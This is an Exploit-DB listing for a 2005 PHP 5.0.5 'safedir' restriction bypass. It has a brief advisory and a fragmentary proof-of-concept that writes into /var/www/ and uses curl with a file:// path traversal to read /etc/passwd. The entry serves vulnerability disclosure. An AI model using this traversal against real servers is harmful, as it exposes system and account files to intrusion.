PHP 5.0.5 Safedir Restriction Bypass Vulnerabilities

ID EDB-ID:26352
Type exploitdb
Reporter anonymous
Modified 2005-10-17T00:00:00


PHP 5.0.5 Safedir Restriction Bypass Vulnerabilities. Local exploit for php platform


PHP is prone to multiple vulnerabilities that permit an attacker to bypass the 'safedir' directory restriction.

An attacker can exploit these vulnerabilities to possible execute arbitrary code currently existing on a vulnerable system, or to retrieve the contents of arbitrary files, all in the security context of the Web server process.

Information obtained may aid in further attacks against the affected system; other attacks are also possible.

These issues have been addressed in the latest CVS version. 

$im = imagecreatefromgif("file.gif");
imagegif($im, '/var/www/');


$ch = curl_init("file://".$_SERVER["SCRIPT_FILENAME"]."?/../../../../../../../../../../../etc/passwd ");


echo $file;